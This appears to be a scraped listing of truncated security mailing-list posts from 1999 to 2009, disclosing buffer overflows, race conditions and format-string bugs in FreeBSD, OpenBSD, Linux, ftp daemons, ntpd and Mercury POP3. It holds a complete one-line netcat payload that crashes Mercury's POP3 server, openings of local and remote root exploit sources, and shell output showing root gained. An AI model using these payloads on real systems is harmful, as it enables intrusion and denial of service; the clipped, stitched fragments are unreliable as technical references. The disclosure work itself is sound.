FreeBSD 7.2 and below (including 6.4) are vulnerable to a race condition in the VFS
and devfs code, resulting in a NULL pointer dereference. In contrast to the pipe race
condition, this vulnerability is actually much harder to exploit.
Due to an uninitialised value in devfs_open(), the following function is called wi
FreeBSD 6.4 and below are vulnerable to a race condition between pipeclose() and
knlist_cleardel() resulting in a NULL pointer dereference. The following code
exploits the vulnerability to run code in kernel mode, giving a root shell and
escaping from jail.
http://www.frasunek.com/pipe.txt
The bug was fixe
Przemyslaw Frasunek writes:
> FreeBSD <= 6.1 suffers from a classical check/use race condition on SMP
There is yet another kqueue-related vulnerability. It affects 6.x, up to
6.4-STABLE. The FreeBSD security team was notified on 29th Aug, but there has been no
response until now, so I won't
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
FreeBSD <= 6.1 suffers from a classical check/use race condition on SMP
systems in the kevent() syscall, leading to a kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
the 1st thread looping on open() and close() syscalls, and the
Tavis Ormandy writes:
> Linux NULL pointer dereference due to incorrect proto_ops initializations
> -
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
--
* Fido: 2:480/124 ** WWW: http://www.frasun
User Janusz Niewiadomski wrote:
This bug may be non-exploitable if the size of the buffer is greater than
MAXPATHLEN characters. This may occur, for example, if wu-ftpd is compiled
with some versions of Linux kernel where PATH_MAX (and MAXPATHLEN
accordingly) is defined to be exactly 4095 charac
Jonas Eriksson <[EMAIL PROTECTED]> wrote:
> o Fixed a security hole in prompt rewriting found by Global InterSec.
Looks like it won't be easy to exploit.
There are a few possible scenarios: using an unlink() or frontlink()
macro in chunk_alloc() or chunk_free(). In both cases we can control
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
----- Forwarded message from [EMAIL PROTECTED] -----
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: user/2536: possible root comprom
> It still seems to be affected under 3.5beta9 (including this version)
> someone said it's not the problem of exploitable vulnerability about 8
> months ago,
FreeBSD is not affected. The problem was fixed 9 months ago and an advisory was
issued. See:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/Fre
> > http://www.frasunek.com/sources/security/rexec/
> This workaround is not complete, because it doesn't protect against the bug's
> exploitation. For example, the attacker can send the shellcode via stdin
> to the suid program. Its address can also be determined by removing
> the suid bit from the prog
> This problem has been fixed and the exploit didn't work for the last
> 4.3-RELEASE FreeBSD.
The exploit *works* even for 4.3-STABLE, before the correction date (2 Jul 2001):
riget:venglin:~> ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root) gid=1001(use
> Well, after a bunch of tests I've found only two suids which gave me
> suid shell:
> /usr/bin/passwd
> /usr/local/bin/ssh1
/usr/bin/su also works for me:
riget:venglin:~> egrep -e execl vvfreebsd.c
if(!execl("/usr/bin/su","su","szymon",0))
riget:venglin:~> ./v
vvfreebsd. Written by Georgi G
> FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
This problem was already reported to FreeBSD Security Officer about two
months ago, but it was totally ignored.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D4
On Thu, Jun 14, 2001 at 05:14:46PM +0300, Georgi Guninski wrote:
> OpenBSD 2.9,2.8
> Have not tested on other OSes but they may be vulnerable
FreeBSD 4.3-STABLE isn't vulnerable. Looks like it's dropping set[ug]id
privileges before allowing detach.
--
* Fido: 2:480/124 ** WWW: http://www.frasun
On Tue, Apr 24, 2001 at 01:09:59PM +0300, Atro Tossavainen wrote:
> My colleague reports that NetWare servers running Mercury 1.48 crash
> happily.
I've tested it on Mercury 1.48 on Netware 4.10 and it crashed. Mercury 1.48
on Netware 4.11 didn't crash.
--
* Fido: 2:480/124 ** WWW: http://www.
On Sat, Apr 21, 2001 at 10:52:15AM +0200, Przemyslaw Frasunek wrote:
> All versions of the widely-used POP3 server from the Mercury MTA package for Netware
> are vulnerable to a remote buffer overflow allowing the Netware server to be crashed:
Actually, the problem was fixed in Mercury 1.48, but no advisory was
Hello,
All versions of the widely-used POP3 server from the Mercury MTA package for Netware
are vulnerable to a remote buffer overflow allowing the Netware server to be crashed:
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
Remote execution of malicious code is also theoretically poss
On Sat, Apr 14, 2001 at 04:41:43PM -0400, fish stiqz wrote:
> If anyone gets this working on other systems, let me know.
This is another version of the globbing exploit, written about a week ago. It
creates only one directory.
#!/usr/bin/perl
##
On Thu, Apr 05, 2001 at 10:56:45PM -0500, Stephen Clouse wrote:
> Having no effect on ntp-4.0.99k compiled from official source on Slackware
> 7.0. Exploit says /tmp/sh was spawned but it never actually runs (/bin/bash
> mode didn't change).
As I said, exploiting this overflow isn't so easy -- o
/* ntpd remote root exploit / babcia padlina ltd. <[EMAIL PROTECTED]> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is
On Wed, Mar 07, 2001 at 04:40:05AM +0100, Nomen Nescio wrote:
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
This is an old wu-ftpd 2.6.0 SITE EXEC exploit. 2.6.1 is not vulnerable
to this attack.
> strcpy (cmdbuf, "SITE EXEC ");
> for (ret = 0; ret <
On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work.
> i tried significantly more a's and nothing happens. i get the normal
> response from stat.
Are you sure? This is the output from the same version of QNX RTP, downloade
On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
> > BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
> > vulnerable to this attack.
> In case anyone is wondering how old is old:
The same problem persists in the heimdal / kerberosIV ftpd implementation:
hei
QNX RTP uses a BSD-derived FTP server, which is vulnerable to a strtok()
based stack overflow.
Offending code from ftpd/popen.c:
char **pop, *argv[100], *gargv[1000], *vv[2];
for (argc = 0, cp = program;; cp = NULL)
if (!(argv[argc++] = strtok(cp, " \t\n")))
Hello,
Mars_nwe 0.99.pl19 is vulnerable to a remote format string vulnerability,
allowing superuser privileges to be gained from DOS/Windows workstations
attached to the mars server.
Here is the patch:
--- tools.c.origFri Jan 26 22:46:34 2001
+++ tools.c Fri Jan 26 22:46:59 2001
@@ -189,7 +18
Another example of bad coding in ftp daemons, proftpd-1.2.0rc2 in this case.
main.c:659:
void main_exit(void *pv, void *lv, void *ev, void *dummy)
{
int pri = (int) pv;
char *log = (char *) lv;
int exitcode = (int) ev;
log_pri(pri, log); /* here */
main_exit() is called by shutdown_e
Hello,
There are two non-exploitable format string bugs in wu-ftpd 2.6.1.
ftpd.c:6272
if (debug) {
char *s = calloc(128 + strlen(remoteident), sizeof(char));
if (s) {
int i = ntohs(pasv_addr.sin_port);
sprintf(s, "PASV port %i assigned to %s", i, remot
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBS
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */
#include
#include
#include
#include
#define NOP 0x90
#define BUFSIZE 1
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
buffer0verfl0w security advisory #3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
On Tue, Mar 07, 2000 at 09:14:32PM -, Lamagra Argamal wrote:
> On FreeBSD dump has the same hole I described in my previous post. Only it is
> exploitable :-)
but on freebsd, dump is only sgid tty.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: [EMA
On 02-Mar-2000 Derek Callaway wrote:
> I believe this overflow is rather difficult to exploit, (although, not
> impossible) as a result of a setuid(getuid()) before the offending code
it does setuid(), but NOT setgid(). still vulnerable.
the major problem is how to pass valid **envp to stack and
On 01-Mar-2000 Derek Callaway wrote:
> (gdb) #0 getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
> From this gdb session, it appears that there _could_ be a problem with
> the way that glibc's time functions behave.
No. getenv() fails because *envp, argc, **argv are AFTER pathname[]
/*
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
*
* redhat 6.1 /usr/bin/man exploit
*/
#include
#include
#include
#include
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long getesp(void)
{
__asm__("movl %esp,
-----BEGIN PGP SIGNED MESSAGE-----
Babcia Padlina Ltd. Security Advisory (BP-9909:00)
Synopsis:
Cfingerd is vulnerable to a local buffer overflow attack.
Vulnerable versions:
Cfingerd 1.4.2 and ea
-----BEGIN PGP SIGNED MESSAGE-----
On 02-Sep-99 Taneli Huuskonen wrote:
> + snprintf(command, sizeof(command)-1, "mv %s %s 2>&1 >/dev/null" , oldname,
> newname);
>return(system(command));
> }
>
> Without seeing the context, I can't say for sure, but this looks like a
> hole big enough to
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Babcia Padlina Ltd. Security Advisory (BP-9908:01)
Synopsis:
Babcia Padlina Ltd. has discovered many buffer overruns in running
with superuser privili
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
* babcia padlina ltd. (poland, 17/08/99)
*
* your ultimate proftpd pre0-3 exploiting toolkit
*
* based on:
* - adm-wuftpd by duke
* - kombajn do czereśni by Lam3rZ (thx for shellcode!)
*
* thx and greetz.
*/
#include
#
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -FW: <[EMAIL PROTECTED]>-
Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Sender: [EMAIL PROTECTED]
From: Przemyslaw Frasunek <[EMAIL PROTECTED]>
To: Rafal Banaszkiewicz <[EMAIL PROTECTED]>
Subject: RE: fts_print() , find an
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
/*
(c) 1999 babcia padlina ltd. <[EMAIL PROTECTED]>
a bug in the fts_print function allows any file in the system to be overwritten when
running the /etc/security script (executed from the 'daily' scripts).
affected systems:
- freebsd (all versions)
- probably